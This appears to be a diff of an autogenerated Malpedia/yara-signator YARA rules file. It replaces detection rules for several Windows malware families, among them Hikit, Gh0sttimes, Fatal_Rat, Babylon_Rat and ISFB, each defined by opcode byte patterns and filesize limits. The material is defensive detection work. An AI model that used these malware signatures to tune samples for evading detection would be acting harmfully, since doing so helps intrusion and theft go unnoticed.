-		$sequence_1 = { 03f8 7402 ffd6 ffd6 ffd6 }
-		$sequence_2 = { 03f8 ffd6 8bd8 ffd6 0fafd8 }
-		$sequence_3 = { ffd6 03f8 ffd6 8bd8 ffd6 0fafd8 ffd6 }
-		$sequence_4 = { 740f 3ccf 740b 34cf }
-		$sequence_5 = { ffd6 03f8 ffd6 8bd8 ffd6 0fafd8 }
-		$sequence_6 = { 7513 6a64 ff15???????? 68???????? }
-		$sequence_7 = { 8bf8 ffd6 0faff8 8d3c7f }
-		$sequence_8 = { ffd6 03f8 7402 ffd6 ffd6 }
-		$sequence_9 = { 8bf8 ffd6 0faff8 ffd6 }
+		$sequence_0 = { 68???????? bf08020000 8d85ecfbffff 57 }
+		$sequence_1 = { 8b16 50 8b442410 03c1 50 51 8bce }
+		$sequence_2 = { 8b08 8b422c 8b00 2bc1 03c7 33db }
+		$sequence_3 = { ffd6 ff75fc ffd6 6a00 6a01 8d4d08 e8???????? }
+		$sequence_4 = { 8b45e0 c1e814 8b4dfc 5f 33cd 5e e8???????? }
+		$sequence_5 = { e8???????? 68???????? 8d85ecfbffff 57 50 e8???????? }
+		$sequence_6 = { 51 ffb564ffffff 8d8dc0feffff e8???????? ba???????? }
+		$sequence_7 = { 48 0d00ffffff 40 8a0a 8985f8f7ffff 8bbdf8f7ffff 0fb6c1 }
+		$sequence_8 = { 895df8 3b5df4 0f8270ffffff 5f }
+		$sequence_9 = { 59 8bf0 8bcf 33c0 89b5e8f7ffff 2185f0f7ffff }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Hikit_Auto : FILE
+rule MALPEDIA_Win_Gh0Sttimes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3cdc5f2c-e59e-5de2-a448-8a8d65bcfa6a"
+		id = "45c172b9-1490-520d-9674-c2fea272cf58"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hikit_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gh0sttimes_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "0bc449cc629b4fb561ad191213636c79bd60e251037b5d8cd78af6bf7f1045a2"
+		logic_hash = "b365988442ea76655e7c2dc8b1db33d5df97fce16bdb0e3992e0bc9191760298"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81795,32 +82240,38 @@ rule MALPEDIA_Win_Hikit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d542414 52 895c2418 e8???????? 83c404 3bc3 741a }
-		$sequence_1 = { 0fbe84c188e30110 6a07 c1f804 59 8985a4fbffff 3bc1 }
-		$sequence_2 = { 895dfc 89450c ffd7 3bc3 7407 8b4d0c }
-		$sequence_3 = { 8bf0 85f6 7505 5e 5f 5d 59 }
-		$sequence_4 = { 48 8b4c2420 48 8b4910 ff90d0020000 48 }
-		$sequence_5 = { 4c 8b4c2478 4c 8b442470 4d 8b4018 48 }
-		$sequence_6 = { 817c241018031120 751d 8b442414 83e801 750a 8d4c2410 51 }
-		$sequence_7 = { 8d4c2420 ff15???????? 89442438 837c243800 7405 e9???????? 48 }
-		$sequence_8 = { 56 ff15???????? b001 eb08 ff15???????? 32c0 5f }
-		$sequence_9 = { e9???????? 48 8b842468010000 0fb600 240f 0fb6c0 c1e002 }
+		$sequence_0 = { c68598fcffff05 889d99fcffff ff15???????? 68???????? 8d841d9bfcffff 50 }
+		$sequence_1 = { c685b4feffff6d e8???????? eb05 e8???????? }
+		$sequence_2 = { ffd3 8b3f 85ff 0f844f020000 }
+		$sequence_3 = { e8???????? 83f8ff 7510 57 ff15???????? }
+		$sequence_4 = { 6a01 8d4d08 8bd6 c645086b e8???????? e9???????? 33ff }
+		$sequence_5 = { e8???????? 8bfc 57 56 }
+		$sequence_6 = { ffd3 e9???????? 8b8d8cfeffff 8b8588feffff 894e24 6a01 }
+		$sequence_7 = { c7858cfcffff03000000 c78590fcffff00000000 c68594fcffff05 889d95fcffff c68596fcffff00 889d97fcffff }
+		$sequence_8 = { 488b4c2438 488d442430 488d15da700200 4889442428 }
+		$sequence_9 = { 488b8f40010000 ff15???????? 488b8f40010000 ff15???????? 48c78740010000ffffffff 488b8c2490000000 4833cc }
+		$sequence_10 = { 488b4c2430 488b4968 e8???????? 4c8b5c2430 }
+		$sequence_11 = { 488b4c2438 488d442434 4c8d4c2430 4889442428 488d442440 488d1520790200 }
+		$sequence_12 = { 488b4c2430 488b4968 33c0 66890451 488b442430 }
+		$sequence_13 = { 488b4c2430 48c1e80c f7d0 334108 }
+		$sequence_14 = { 488b4c2438 488d442430 488d150c710200 4889442428 }
+		$sequence_15 = { 488b4c2430 83490c08 a808 7409 488b442430 83480c04 }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Spectre_Auto : FILE
+rule MALPEDIA_Win_Mimic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "97f71f8a-8fe2-5a94-98b9-e19f44e57e9b"
+		id = "b7917b34-b106-57a3-b31d-217974d73754"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spectre"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spectre_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mimic_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "fb8efa47f6cbb2730748ec520c0057da98d0d3b4bb855873b3521ccc59bde3f2"
+		logic_hash = "ea5e4099bfde229f604346a64d8a2d013028ba263c49de05a138be9fade4fcfb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81834,32 +82285,32 @@ rule MALPEDIA_Win_Spectre_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 40 8945b0 894dac 3d00100000 7215 8d45b0 50 }
-		$sequence_1 = { 8d8c243c010000 e8???????? 8b8c2454010000 5f 5e 5d 5b }
-		$sequence_2 = { 897110 897114 e8???????? e8???????? 83c418 83ec18 8bcc }
-		$sequence_3 = { 8d45cc 57 ff7510 8b7d08 50 e8???????? 59 }
-		$sequence_4 = { 51 e8???????? 59 59 885c2410 8d8424a0000000 ff742410 }
-		$sequence_5 = { 58 0fb60c8556424600 0fb6348557424600 8bf9 8985d8f6ffff c1e702 57 }
-		$sequence_6 = { 8b30 ffd7 bb???????? 6685c0 0f85b0030000 b9a2000000 83fe6e }
-		$sequence_7 = { 85ff 7425 8b442444 2bc3 50 53 }
-		$sequence_8 = { 53 53 ff7584 ffd7 85c0 740c ff36 }
-		$sequence_9 = { 3dffffff3f 7479 40 57 50 89442414 e8???????? }
+		$sequence_0 = { 83fa08 7231 8b8db4f5ffff 8d145502000000 8bc1 81fa00100000 7210 }
+		$sequence_1 = { c60100 e8???????? 8a955bfeffff 8d8d30feffff e8???????? 83c418 89854cfeffff }
+		$sequence_2 = { 8d442424 50 6a28 ff15???????? 50 ff15???????? 85c0 }
+		$sequence_3 = { e8???????? 8d4dcc 8b30 8d8548feffff 50 e8???????? 57 }
+		$sequence_4 = { 68???????? 57 894590 ff15???????? 68???????? 57 89458c }
+		$sequence_5 = { 0f872a040000 52 51 e8???????? 83c408 57 }
+		$sequence_6 = { e8???????? 8945e4 c745fc00000000 c7461000000000 c746140f000000 c60600 c745ec08000000 }
+		$sequence_7 = { 8d4dd4 e9???????? 8d4dec e9???????? 6a1c 8b857cfdffff 50 }
+		$sequence_8 = { c745d00f000000 c645bc00 e8???????? c645fc04 8d4dbc 6a0e 68???????? }
+		$sequence_9 = { c785e0fefffff3dd6046 50 68060000c8 56 c785e4feffff8ee976e5 c785e8feffff8c74063e ff15???????? }
 
 	condition:
-		7 of them and filesize < 990208
+		7 of them and filesize < 4204544
 }
-rule MALPEDIA_Win_Slothfulmedia_Auto : FILE
+rule MALPEDIA_Win_Friedex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2e039255-65fc-54b3-b80d-fbd83d62f398"
+		id = "2136bda7-6880-57af-8169-a2ba9b9744fa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.slothfulmedia_auto.yar#L1-L177"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.friedex_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "4478c19c5b75da4be13e2a5e0ada629ab254eb002384f45d3b79eb582f1a6eaf"
+		logic_hash = "3133b9fe228e62a956c776f3b2c9ea0b2f6b9e5dde15151f1885bdca3ce807d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81873,38 +82324,38 @@ rule MALPEDIA_Win_Slothfulmedia_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3b45ec 0f82e5feffff 8b4508 53 56 }
-		$sequence_1 = { 8d4dec 51 6a58 ffd0 6683bde0fdffff5c 0f8587000000 be???????? }
-		$sequence_2 = { eb28 8b4f10 8bf0 6bf614 8d45fc 50 33c0 }
-		$sequence_3 = { eb65 53 8b1b ff15???????? 59 3bdf }
-		$sequence_4 = { 33db 895de4 8d7de8 ab ab ab 33c0 }
-		$sequence_5 = { f3a6 750b 66ff45f8 66837df85a 72ae }
-		$sequence_6 = { 59 8b45f8 6a01 03c0 50 ff75fc }
-		$sequence_7 = { 53 ff15???????? 59 ff75f8 ffd7 59 }
-		$sequence_8 = { 8d54240c 6a00 52 e8???????? 83c40c 6804010000 8d44240c }
-		$sequence_9 = { 6a00 ff15???????? 8b35???????? 8b3d???????? 90 68???????? }
-		$sequence_10 = { 85c0 7507 ffd7 83f805 74ee 6804010000 }
-		$sequence_11 = { 90 68???????? ffd6 85c0 7507 ffd7 }
-		$sequence_12 = { 81ec0c020000 a1???????? 33c4 89842408020000 56 57 68d0070000 }
-		$sequence_13 = { 6804010000 8d54240c 6a00 52 }
-		$sequence_14 = { 33cc 33c0 e8???????? 81c40c020000 }
-		$sequence_15 = { 6689442414 e8???????? 83c40c 6a00 ff15???????? 8b35???????? }
+		$sequence_0 = { 6a26 8bc8 e8???????? 57 8bc8 e8???????? 6a65 }
+		$sequence_1 = { 03cd 0fb711 6685d2 75c1 6a2a 5f eb06 }
+		$sequence_2 = { eb16 0fb730 663bf7 7416 663bf2 7405 }
+		$sequence_3 = { eb0f 03c5 663938 74f9 33c9 }
+		$sequence_4 = { 85c0 740d ff742408 6a00 6a00 }
+		$sequence_5 = { 8b442408 53 55 56 57 6a2a 5f }
+		$sequence_6 = { 03f5 eb04 03c5 03cd }
+		$sequence_7 = { 6a3f 5a 663bfa 7408 8bce 8bc3 }
+		$sequence_8 = { c744240400000000 8955e8 e8???????? 8d0dbc30a500 890424 894c2404 }
+		$sequence_9 = { 891424 894c2404 8945f8 e8???????? 8d0d4430a500 }
+		$sequence_10 = { c3 55 89e5 83ec10 8b4508 8d0d4430a500 }
+		$sequence_11 = { 83c404 5d c3 55 89e5 8d055a23a500 }
+		$sequence_12 = { 894608 890c24 c744240400000000 8955ec e8???????? 8d0dad30a500 890424 }
+		$sequence_13 = { c7424800100100 8b7de4 c787cc00000000000000 c787c800000000000000 8945dc }
+		$sequence_14 = { 8945d0 74e4 31c0 8d0d5a23a500 }
+		$sequence_15 = { e8???????? 8d0d4430a500 31d2 8b75f8 89460c 890c24 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Nokki_Auto : FILE
+rule MALPEDIA_Win_Fatal_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "608277dd-14a1-5c03-9518-935e0938d8bc"
+		id = "a3ab53f5-ddae-5778-83ad-a5bc6a6b2154"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nokki_auto.yar#L1-L154"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fatal_rat_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "f2978451176a73f0cc8bbc4000d4256ca994dc4b0d13d500f33621551196e998"
+		logic_hash = "18acd6224a0284d907688395a284887997a86c92f189b4ab24835c18aeeace4b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81918,36 +82369,32 @@ rule MALPEDIA_Win_Nokki_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 33d2 68ce070000 52 }
-		$sequence_1 = { e8???????? 33c9 68ce070000 51 }
-		$sequence_2 = { 39b890e94000 0f8491000000 ff45e4 83c030 3df0000000 }
-		$sequence_3 = { 50 8d8da8ddffff bfe8030000 51 89bd40d4ffff }
-		$sequence_4 = { 8bff 56 57 33ff ffb7b80d4100 }
-		$sequence_5 = { e8???????? 59 59 8b7508 8d34f500ed4000 391e }
-		$sequence_6 = { c1f905 8b0c8dc02b4100 83e01f c1e006 f644080401 }
-		$sequence_7 = { a1???????? 8b500c b9???????? 895dfc c78554e8ffff01000000 ffd2 }
-		$sequence_8 = { 47 897e14 897e70 c686c800000043 c6864b01000043 c7466860e54000 6a0d }
-		$sequence_9 = { c1e006 03049580054100 eb05 b8???????? }
-		$sequence_10 = { e9???????? 8bc6 c1f805 8bfe 53 8d1c85c02b4100 }
-		$sequence_11 = { 7524 a1???????? a3???????? a1???????? c705????????6a464000 8935???????? a3???????? }
-		$sequence_12 = { 8bec 8b4508 ff34c5100a4100 ff15???????? 5d c3 6a0c }
-		$sequence_13 = { 741b 8b06 8bc8 c1f905 83e01f c1e006 8b0c8d80054100 }
+		$sequence_0 = { 57 ff15???????? 3bc7 89450c 0f8415020000 8d4b02 56 }
+		$sequence_1 = { c6458265 c6458378 c6458465 885d85 c645a065 c645a167 c645a275 }
+		$sequence_2 = { 5f 5d c3 55 8bec 81ece0060000 53 }
+		$sequence_3 = { ff15???????? 8d857cffffff 50 e8???????? 85c0 59 7429 }
+		$sequence_4 = { eb34 8d859cfeffff 50 ff15???????? 8d859cfeffff 68???????? 50 }
+		$sequence_5 = { 56 ff15???????? 68???????? 56 ff15???????? 8d85a4feffff }
+		$sequence_6 = { eb19 833801 7407 b800000800 eb0d 8b4004 }
+		$sequence_7 = { 8d8568feffff 6804010000 50 56 ff15???????? 8d8568feffff 50 }
+		$sequence_8 = { 56 8b4304 8945f8 8b03 0fb74814 6683780600 8d740118 }
+		$sequence_9 = { c645ee68 c645ef70 885df0 ff15???????? 8bf8 3bfb 897df8 }
 
 	condition:
-		7 of them and filesize < 454656
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Bluelight_Auto : FILE
+rule MALPEDIA_Win_Babylon_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9ab2727d-5272-5ca8-92a4-f15ef9dc3660"
+		id = "9f7a1796-9db6-5951-ad0f-bee6b4401843"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bluelight_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.babylon_rat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "807d4d695fef666ac0d7be4d86c77f03bfb065bf15881d360fd3af2db66d4f22"
+		logic_hash = "21f4c795c3602b5a17bf075d20095868b597667dfa16017802f014398ad09283"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81961,32 +82408,32 @@ rule MALPEDIA_Win_Bluelight_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff722c 8b5104 8d4d98 897588 e8???????? 89458c 83c410 }
-		$sequence_1 = { f6433804 7403 83e0c3 0fb74f1a 0fb77718 898d4cffffff 0fb74f1c }
-		$sequence_2 = { f77720 40 3bf0 74e3 8b7dec 8b45f0 8975f8 }
-		$sequence_3 = { ff7508 ff701c 6a25 5a e8???????? 83c40c 8945d4 }
-		$sequence_4 = { 68???????? 53 e8???????? 8b55ec 83c424 85d2 7407 }
-		$sequence_5 = { f3a5 eb23 ff742420 68???????? eb92 8d4101 8bcb }
-		$sequence_6 = { e8???????? 8bd3 895da8 3955c4 0f8e24130000 8b45c8 8b4004 }
-		$sequence_7 = { e8???????? 8bd7 8bce e8???????? fe4b12 8d742418 6a14 }
-		$sequence_8 = { ff4140 5b 8be5 5d c3 55 8bec }
-		$sequence_9 = { eb26 f7462400400000 7421 8b4620 85c0 741a 8b5010 }
+		$sequence_0 = { 894b34 8b4610 8b4dc8 8b44010c 894318 8b45fc 668b00 }
+		$sequence_1 = { ff7514 6a00 ff7510 ff750c 6a18 57 e8???????? }
+		$sequence_2 = { f6401620 7407 b806010000 5d c3 8b4848 53 }
+		$sequence_3 = { ffb510ffffff 52 56 e8???????? 83c40c 89852cffffff 85c0 }
+		$sequence_4 = { e8???????? 59 8945fc bf???????? 8b1f 50 53 }
+		$sequence_5 = { 8bc6 8b7510 eb03 8b4510 50 57 e8???????? }
+		$sequence_6 = { ff7518 ff75a8 ff75e4 ff75e0 ff75ac ff75f4 ffb57cffffff }
+		$sequence_7 = { ff7240 8b4004 ff75ec 8b00 894508 0fb74020 8945f4 }
+		$sequence_8 = { 8b45f8 0fb7f1 8b4df4 53 8364020100 c644020700 8b4124 }
+		$sequence_9 = { eb75 0fbf4320 3bc8 7514 8b45b8 6a00 03c1 }
 
 	condition:
-		7 of them and filesize < 2191360
+		7 of them and filesize < 1604608
 }
-rule MALPEDIA_Win_Lightlesscan_Auto : FILE
+rule MALPEDIA_Win_Sysget_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2e37f7e0-e58a-5e11-9705-46b3e404ff4c"
+		id = "6dbd418c-6815-50a8-abcf-151d7391ffca"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightlesscan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightlesscan_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sysget_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "065574078c0aa4243fb06e1821f47ea5dd0c55644c6efc29c5c042e930dc4c7f"
+		logic_hash = "902f9069de33837221babbb397abede3730b90e4c77213918173008758853f78"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82000,34 +82447,34 @@ rule MALPEDIA_Win_Lightlesscan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b542450 488bce e8???????? eb11 83fb04 0f8571070000 }
-		$sequence_1 = { 8905???????? 741b 488d0d0e750300 e8???????? 488b0d???????? ffd0 8b05???????? }
-		$sequence_2 = { 4c8bca 488905???????? 66c7000a01 e8???????? 488d0d0a180400 c705????????01000000 e8???????? }
-		$sequence_3 = { 48896c2418 56 57 4154 4881ec80020000 488b05???????? }
-		$sequence_4 = { 4c8d41ff 498bcc e8???????? 4c8d0580d30400 488d15f1cb0400 488d8d00020000 e8???????? }
-		$sequence_5 = { 48899c24e0040000 488b5c2448 4c89bc2490040000 4883c308 4c8d3d63780500 8b03 83f8ff }
-		$sequence_6 = { 4d2bc8 ba08020000 48ffc9 49d1f9 894d80 488d8df0030000 4d03c9 }
-		$sequence_7 = { 66f2af 48f7d1 4c8d41ff 498bcc e8???????? 488bcb ff15???????? }
-		$sequence_8 = { 4c8bc0 4883c702 4983c002 eb0f 664489a5a0070000 4c8b4650 498bf8 }
-		$sequence_9 = { 488b4c2468 488b01 ff5010 e9???????? 488b4c2458 488b01 4533c0 }
+		$sequence_0 = { 0f84f2000000 6a08 6a18 53 53 8d45e4 }
+		$sequence_1 = { 8bd3 59 2bd0 8a08 880c02 }
+		$sequence_2 = { 56 8975d0 8975a4 ff15???????? 8b3d???????? }
+		$sequence_3 = { ffd6 682b010000 8d85d5fdffff 53 50 }
+		$sequence_4 = { 83c702 6685c0 75f4 4b 53 8d85e4fbffff }
+		$sequence_5 = { 8b450c 8d95e4fbffff 83c40c 2bd0 0fb708 66890c02 }
+		$sequence_6 = { 59 8bc8 85d2 7407 c60100 }
+		$sequence_7 = { a5 6a30 8985f8feffff 8d850cffffff 6a00 50 }
+		$sequence_8 = { 395dfc 7508 6a7b 58 e9???????? }
+		$sequence_9 = { 53 ff75f8 ff15???????? 5f 5e 33c0 }
 
 	condition:
-		7 of them and filesize < 1399808
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Isfb_Auto : FILE
+rule MALPEDIA_Win_Webc2_Cson_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad10a285-c85e-5394-87a5-a8221885f0c5"
+		id = "13b28ac1-90a8-569b-9437-56c16ba607cd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.isfb_auto.yar#L1-L1627"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_cson_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "98d556ee27067e40eff884830538b87541d671166c2ebdd8799d4e04e5a64591"
+		logic_hash = "9a18d875b3b14f91d30d03a0640ea0a5b789b8ad5cdc4c9d1d8ddab08372dfdc"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82039,215 +82486,34 @@ rule MALPEDIA_Win_Isfb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 33c0 e8???????? 3bc7 740f }
-		$sequence_1 = { 33c0 3bc7 741b 50 33c0 }
-		$sequence_2 = { 33c0 3bc7 7413 50 }
-		$sequence_3 = { ff75f4 6822010000 e9???????? ff7508 }
-		$sequence_4 = { 6a10 58 e8???????? 3bc7 7406 50 e8???????? }
-		$sequence_5 = { 51 57 50 e8???????? 83c40c e8???????? 3bc7 }
-		$sequence_6 = { 6a64 ff15???????? a1???????? 85c0 7407 83ee64 }
-		$sequence_7 = { ff35???????? e8???????? 8bf0 3bf3 7443 6aff }
-		$sequence_8 = { 50 e8???????? 3bdf 7414 }
-		$sequence_9 = { ff35???????? ff15???????? 85c0 a3???????? 7402 ffe0 }
-		$sequence_10 = { 5b 59 c20400 8325????????00 }
-		$sequence_11 = { ff15???????? 3c05 7506 84e4 7704 3ac0 }
-		$sequence_12 = { 5b c20400 55 8bec 83ec0c a1???????? 8365f800 }
-		$sequence_13 = { 83451004 83c004 49 8917 75e9 8b4e10 83e103 }
-		$sequence_14 = { b8???????? 53 bb60ea0000 53 }
-		$sequence_15 = { 75e9 8b4e10 83e103 740d 51 50 ff7510 }
-		$sequence_16 = { 3bc3 7512 e8???????? 3bc3 a3???????? }
-		$sequence_17 = { 8b10 2b55fc 8b7d10 0155fc 83451004 83c004 49 }
-		$sequence_18 = { 51 50 ff7510 e8???????? 83c40c c745fc01000000 8b4610 }
-		$sequence_19 = { ff37 ff15???????? 2b442414 50 }
-		$sequence_20 = { 8b4320 897324 897328 83c40c 8974240c c6401a00 8b44240c }
-		$sequence_21 = { 57 8b3b 897c241c 760a 8b4b20 e8???????? eb02 }
-		$sequence_22 = { 83631c00 894b34 8b4b24 2b4b28 894c2410 8b4b34 }
-		$sequence_23 = { 8a4604 2404 f6d8 1bc0 }
-		$sequence_24 = { 7520 ff37 50 ff35???????? ff15???????? 8b442414 }
-		$sequence_25 = { 6a0d 58 e8???????? 85c0 740d 8906 }
-		$sequence_26 = { ff15???????? 8b442414 8b4c240c 8907 8b442418 894110 836334f9 }
-		$sequence_27 = { 8b07 03442418 50 56 ff5310 8b16 }
-		$sequence_28 = { ff35???????? 0fc8 50 a1???????? }
-		$sequence_29 = { 68???????? e8???????? 8b07 c6400731 8b74241c 8b1e 6a00 }
-		$sequence_30 = { 837d1800 b8???????? 7505 b8???????? 53 }
-		$sequence_31 = { 53 8bc6 e8???????? 85c0 7516 }
-		$sequence_32 = { 752f 8b450c 8930 eb33 6a00 }
-		$sequence_33 = { 8b4c240c 8911 eb07 6a0b eb02 }
-		$sequence_34 = { 488bcf c744242860ea0000 4c0f45c8 48895c2420 e8???????? }
-		$sequence_35 = { 3bc8 7415 8b5210 3bd0 740e }
-		$sequence_36 = { 3bd0 7420 8b4a0c 3bc8 7415 }
-		$sequence_37 = { 50 8d4508 50 53 8bc6 }
-		$sequence_38 = { 74a3 33ff eb0b 33ff }
-		$sequence_39 = { 750e 837d0800 7408 ff7508 e8???????? 8bc7 }
-		$sequence_40 = { c21000 55 8bec 83ec14 a1???????? 53 56 }
-		$sequence_41 = { 57 6a01 ff75e0 68???????? }
-		$sequence_42 = { 4885ff 4c8be7 75c4 48892e eb02 33db 488b0d???????? }
-		$sequence_43 = { 498bcc eb07 83c301 488d4801 66ba2000 ff15???????? 4885c0 }
-		$sequence_44 = { e8???????? be01000000 8bc6 4883c440 }
-		$sequence_45 = { 488bcf ff15???????? 4c8964dd00 83c301 }
-		$sequence_46 = { 33d2 41c1e003 ff15???????? 4885c0 488be8 7453 }
-		$sequence_47 = { 415c 5f 5e 5d 5b c3 8b4754 }
-		$sequence_48 = { e8???????? 85c0 742d ff75fc 6a0d }
-		$sequence_49 = { 33db 66ba2000 498bcc ff15???????? 4885c0 }
-		$sequence_50 = { 53 b800080000 50 56 ff35???????? }
-		$sequence_51 = { 740f 488b0d???????? 33d2 ff15???????? bb01000000 498bcc eb07 }
-		$sequence_52 = { 498bcc ff15???????? 33db 66ba2000 }
-		$sequence_53 = { a3???????? 7402 ffe0 c20400 55 8bec 83ec10 }
-		$sequence_54 = { 53 ff35???????? c745f408000000 ff15???????? 3bc3 8945f8 }
-		$sequence_55 = { 8bd5 488bcf bb57000000 e8???????? }
-		$sequence_56 = { e8???????? 3bc3 740f 8b35???????? 50 83c604 e8???????? }
-		$sequence_57 = { ffd7 ff750c ff15???????? a810 }
-		$sequence_58 = { 89450c ff15???????? 3bc3 8945f4 741a ff750c 668918 }
-		$sequence_59 = { 50 83c604 e8???????? 3bfb 7414 a1???????? }
-		$sequence_60 = { 8bd7 e8???????? eb02 33c0 3bc3 741b }
-		$sequence_61 = { 3bc3 7406 50 e8???????? 3bfb 7414 }
-		$sequence_62 = { 6641b85c00 33d2 488bcd ff15???????? }
-		$sequence_63 = { ba08000000 b90e010000 41b800000100 4889442420 e8???????? e9???????? }
-		$sequence_64 = { e8???????? 85db 7423 8b0d???????? }
-		$sequence_65 = { ff15???????? 488bdf 8bf7 483bdf 7508 }
-		$sequence_66 = { 85c0 0f84dc000000 8b45e0 8d4de0 3bc1 0f84ce000000 eb03 }
-		$sequence_67 = { 4883c608 83fd05 72c1 eb0c bb7f000000 eb05 }
-		$sequence_68 = { 57 ff750c 53 e8???????? 3bfe 740e }
-		$sequence_69 = { 8b4330 a804 0f8451ffffff 8b470c }
-		$sequence_70 = { e8???????? 85c0 0f8586000000 8b4720 8b4e04 6a00 }
-		$sequence_71 = { 0f84e2000000 8b7334 8d442418 50 8d442410 50 e8???????? }
-		$sequence_72 = { 8b8c2490000000 83bc248800000000 4c8b442440 488b542448 }
-		$sequence_73 = { ff75fc 56 ff35???????? ff15???????? 53 56 }
-		$sequence_74 = { 83632800 e9???????? 8b4330 a840 0f84e2000000 8b7334 }
-		$sequence_75 = { 752e 53 e8???????? 6a01 }
